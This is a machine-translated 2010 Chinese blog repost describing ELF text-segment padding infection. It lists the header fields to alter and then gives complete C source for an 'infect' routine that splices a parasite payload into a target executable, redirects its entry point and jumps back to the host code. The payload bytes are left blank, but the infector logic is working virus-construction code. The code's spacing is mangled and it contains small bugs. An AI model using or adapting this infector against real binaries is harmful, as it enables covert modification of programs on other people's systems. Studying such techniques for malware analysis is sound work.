A binary code injection device (for infection ELF file) (change)

2010-08-12  来源:本站原创  分类:OS  人气:182 

Mainly modify the ELF header structure and the first section of the structure of the first section of the structure of some of the items in order to achieve the purpose of inserting the virus code. Using a sample of the binary code as the virus shows. The aim is not programmed devices ELF file infected, the virus did not write real code, just the process of realization of the first infection. To test the code before the infected program execution.

We need to make changes to the ELF file:
An amendment to "ELF header" in the e_shoff, PAGESIZE size increase

2 amendments to the tail of the parasitic code, so that it can jump back to the host code of the original entry point positioning "text segment program header"
3 amend "ELF header" in the e_entry, point p_vaddr + p_filesz
4 amended p_filesz
5 amended p_memsz

For the text of paragraph 6 after the other phdr phdr amendment p_offset, PAGESIZE size increase
For the text of paragraph 7 of the last shdr amendment sh_size, increase the size of the parasitic code
8 For those who are into parasitic effects offset each code section shdr amendment sh_offset, PAGESIZE size increase
9 physically inserted in the document and fill the parasitic code (to ensure a complete page) to this location text segment p_offset + p_filesz (original).

Code:

/*
ELF infector source file
Student:

Student ID:
Class:

*/

# include < stdio. h>
# include < stdlib. h>
# include < elf. h>
# include < sys/ types. h>
# include < sys/ stat. h>
# include < fcntl. h>
# include < string . h>

//Define PAGESIZE,default 4K byte

# define PAGESIZE 4096

//Parasite Virus Code.The code is copied from Internet.

char Virus[ ] ={/*Binary code for test*/} ;

int infect( char * ElfFile) ;
//The size of Virus Code
int VirusSize= sizeof ( Virus) ;

int jmppoint=/*Jump point of binary code of Virus*/;

//Infector Function

int infect( char * ElfFile)
{
    int result= 0;
    int Re;
    int FileD;
    int TmpD;
    int OldEntry;
    int OldShoff;
        int OldPhsize;
        int i= 0;

    Elf32_Ehdr elfh;
    Elf32_Phdr Phdr;
    Elf32_Shdr Shdr;

    //Open ELF file and read the elf header part to &elfh

    FileD= open ( ElfFile, O_RDWR) ;
    read ( FileD, & elfh, sizeof ( elfh) ) ;
    if ( ( strncmp ( elfh. e_ident, ELFMAG, SELFMAG) ) ! = 0)
        exit ( 0) ;

        //Old entry of original elf file

    OldEntry= elfh. e_entry;
        //Old section header offset of elf file

    OldShoff= elfh. e_shoff;

    //modify the Virus code line"movl "Oldentry",%eax" to jump to old entry

    //after the Virus code excuted

        * ( int * ) & Virus[ jmppoint ] = OldEntry;

    //Increase e_shoff by PAGESIZE in the ELF header

    elfh. e_shoff + = PAGESIZE;

    //if Virus Size is too large

    if ( VirusSize > ( PAGESIZE- ( elfh. e_entry% PAGESIZE) ) )
                exit ( 0) ;

    int Noff= 0;
    //The loop of read and modify program header

    for ( i= 0; i< elfh. e_phnum; i+ + )
    {

                //seek and read to &Phdr

     lseek( FileD, elfh. e_phoff+ i* elfh. e_phentsize, SEEK_SET ) ;
                read ( FileD, & Phdr, sizeof ( Phdr) ) ;
        if ( Noff)
        {
            //For each phdr who's segment is after the insertion (text segment)

            //increase p_offset by PAGESIZE                

            Phdr. p_offset + = PAGESIZE;

            //write back

            lseek( FileD, elfh. e_phoff+ i* elfh. e_phentsize, SEEK_SET ) ;
            write ( FileD, & Phdr, sizeof ( Phdr) ) ;
        }

        else if ( PT_LOAD = = Phdr. p_type & & Phdr. p_offset= = 0)
        {
            if ( Phdr. p_filesz ! = Phdr. p_memsz)
                exit ( 0) ;
            // Locate the text segment program header

         //Modify the entry point of the ELF header to point to the new

         //code (p_vaddr + p_filesz)

            elfh. e_entry = Phdr. p_vaddr + Phdr. p_filesz+ 4;
            lseek( FileD, 0, SEEK_SET ) ;

            //Write back the new elf header

            write ( FileD, & elfh, sizeof ( elfh) ) ;
            OldPhsize= Phdr. p_filesz;
            Noff= Phdr. p_offset+ Phdr. p_filesz;

            //Increase p_filesz by account for the new code (parasite)

            Phdr. p_filesz + = VirusSize;

            //Increase p_memsz to account for the new code (parasite)    

            Phdr. p_memsz + = VirusSize;

            //write back the program header

            lseek( FileD, elfh. e_phoff+ i* elfh. e_phentsize, SEEK_SET ) ;
            write ( FileD, & Phdr, sizeof ( Phdr) ) ;
        }
    }
    lseek( FileD, OldShoff, SEEK_SET ) ;

    //The loop of read and modify the section header

    for ( i= 0; i< elfh. e_shnum; i+ + )
    {

        lseek( FileD, i* sizeof ( Shdr) + OldShoff, SEEK_SET ) ;
        Re= read ( FileD, & Shdr, sizeof ( Shdr) ) ;

                if ( i= = 1)
        {
            //For the last shdr in the text segment

            //increase sh_size by the virus size    

            Shdr. sh_size + = VirusSize;
        }
                else if ( i!=0)
        {
            //For each shdr whoes section resides after the insertion

            //increase sh_offset by PAGESIZE                

            Shdr. sh_offset + = PAGESIZE;
        }

        //Write Back

        lseek( FileD, OldShoff+ i* sizeof ( Shdr) , SEEK_SET ) ;
        write ( FileD, & Shdr, sizeof ( Shdr) ) ;

    }

    //To get the file size FileStat.st_size

    struct stat FileStat;
    fstat( FileD, & FileStat) ;

    char * Data= NULL ;
    Data= ( char * ) malloc ( FileStat. st_size- OldPhsize) ;

    lseek( FileD, OldPhsize, SEEK_SET ) ;
    read ( FileD, Data, FileStat. st_size- OldPhsize) ;

    //Insert the Virus Code to the elf file

    lseek( FileD, OldPhsize, SEEK_SET ) ;
    write ( FileD, Virus, sizeof ( Virus) ) ;
        char tmp[ PAGESIZE] = { 0} ;

    //Pad to PAGESIZE

        memset ( tmp, PAGESIZE- VirusSize, 0) ;
        write ( FileD, tmp, PAGESIZE- VirusSize) ;

    write ( FileD, Data, FileStat. st_size- OldPhsize) ;
    result= 1;

    free ( Data) ;

    return result;             

}

//Just for test

int main( int argc, char * * argv)
{
      //How to use it

      if ( argc!=2)
      {
        printf ( "Usage : infect <ELF filename>\n" ) ;
                exit ( 0) ;
      }

      int test = infect( argv[ 1] ) ;
      if ( test ! = 1)
      {
     exit ( 0) ;
      }
    return 0;
}
相关文章
  • A binary code injection device (for infection ELF file) (change) 2010-08-12

    Mainly modify the ELF header structure and the first section of the structure of the first section of the structure of some of the items in order to achieve the purpose of inserting the virus code. Using a sample of the binary code as the virus shows

  • Byte Code Injection for Dalvik through modified... 2013-06-27

    Deng Yao Mar 12, 2012 at 1:43 pm Sorry for bumping this old thread. Tez, is there any progress on the injection? I need to do something similar. But my problem is more difficult: I cannot build a customized dalvik vm, I can only inject the "monitor&q

  • ELF file analysis and preparation of the virus (change) 2010-08-11

    This article is coming from the Internet search, and turn not know sleep is the original edition, so I am sorry. A recent study linux software crack, need to use these collections for the time being. The purpose of writing this article is to allow in

  • Intel Platform Linux, dynamically linked ELF file loading. Analysis and Case Analysis 2010-08-12

    Dynamic Link, a topic often been mentioned. However, very few articles in this regard to clarify the mechanism of this important software to run, only some of the dynamic link library programming on the article. This series is the dynamic link librar

  • Linux system programming practice to read and modify the ELF file header 2010-08-12

    There are three types of ELF files: relocatable file: that is commonly known as the target file, suffix. O. Share files: that is usually called the library file, suffix. So. Executable file: This article focuses on the file format, in general, the ex

  • LIUNX the back door under the resolution Elf file DT_RPATH 2010-08-12

    1. Introduction 2. Analysis of the three. Conclusion 4. To achieve 5. Reference 1. Introduction Review elf files for some time before the knowledge, the turn of the previous lot of good articles, help files in the unix version xfocus saw alert7 heroe

  • LIUNX Elf file DT_RPATH the back door under the resolution 2010-08-12

    1. Introduction 2. Analysis of the three. Conclusion 4. To achieve 5. Reference 1. Introduction Review elf files for some time before the knowledge, the turn of the previous lot of good articles, help files in the unix version xfocus saw alert7 heroe

  • dedecms v5.1 WriteBookText() code injection vul注入漏洞 2013-12-26

    来源:Ph4nt0m Google Group by [email protected] QQ:378367942 \include\inc_bookfunctions.php --------------------------------------------------- -- function WriteBookText($cid,$body) {<span id="more-1944"></span> global $cfg_cmspath,$cfg

  • Struts2 JSP code to solve the issue of global change 2010-04-12

    The Jsp file struts2 default encoding is ISO-8859-1, change the code as follows: Myelipse-"window-" Preferences-"in the search box or search jsp (in myelipsex Interprise under the files and Editors) in jsp selected, will change the Encoding

  • Servlet activation device and the default Servlet [change] 2010-08-20

    Servlet Activator: In tomcat5.x version tomcat installation directory of the conf directory in the web.xml file such a comment: <! - <servlet> <servlet-name> invoker </ servlet-name> <servlet-class> org.apache.catalina.servlets.

  • Heritrix source code analysis (c) modify the configuration file to speed up your crawl rate order.xml 2010-04-01

    Heritrix's order.xml points a lot of components, the flexibility of the configuration parameters of each crawl. But many people are concerned about how to make faster and more long crawl more, start here first from Heritrix own it, modify some parame

  • JAVA code to read write the resource file 2010-10-23

    import java.io.BufferedInputStream; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.util.Enumeration; import java.util.Properties; /** *

  • Heritrix source code analysis (b) describes the configuration file order.xml 2010-11-21

    http://guoyunsky.javaeye.com/blog/613412 order.xml is the core of the Heritrix, each of which are related to the Heritrix a configuration of the operation, did not read until I can source the channel to learn from the limited use of these configurati

  • Disassemble command and elf, bin, hex conversion between 2010-07-31

    Assembly: the assembly code translated into binary machine code disassembly: the binary machine code translated into assembly code assembly and disassembly are inverse process The following are the prerequisite for linux environment: installed objdum

  • Terrocotta - JVM of Java applications on cluster solutions 2010-10-17

    Original http://blog.csdn.net/lima01/archive/2009/08/22/4471695.aspx Preface More and more business-critical applications must be cluster technology, load balancing (Load Balancing), tolerance (Fault Tolerance) and disaster recovery (Failover). To ac

  • What is a compiled language. Explanatory language and scripting language 2010-03-12

    The computer can not directly understand the high-level language, can only understand machine language directly, it must be high-level language should be translated into machine language, the computer can be value-based high-level language program. T

  • [NLSSORT] Oralce change the collation of the simplified Chinese (Pinyin. Radicals. Stroke) 2011-08-31

    [Change] Oralce NLSSORT collation of Simplified Chinese characters (pinyin, radical, stroke) If the database character set choices are ZH16GBK, then use the order by default in accordance with the Chinese characters of "binary code" sort order.

  • PLT redirection through shared object injection... 2012-12-21

    Download source - 6.02 KB Table of Contents Introduction Prerequisites Brief introduction to the ELF format 3.1 Historical notes 3.2 ELF structure 3.2.1 The ELF header 3.2.2 Program header and segments 3.2.3 The section header 3.2.4 The string table

  • Java dependency injection standard (JSR-330) Introduction 2010-03-30

    Java dependency injection standard (JSR-330, Dependency Injection for Java) 1.0 specification was released in October this year. The specification is mainly for users of dependency injection, while the injector to achieve, the configuration is not fo

  • (Transfer) JAVA programming and how to optimize code to improve performance JAVA 2010-07-20

    By using a number of complementary tools to find process bottlenecks, and bottlenecks on the part of the code can be optimized. There are two options: to optimize the code or change the design. We usually choose the latter, because the do not call th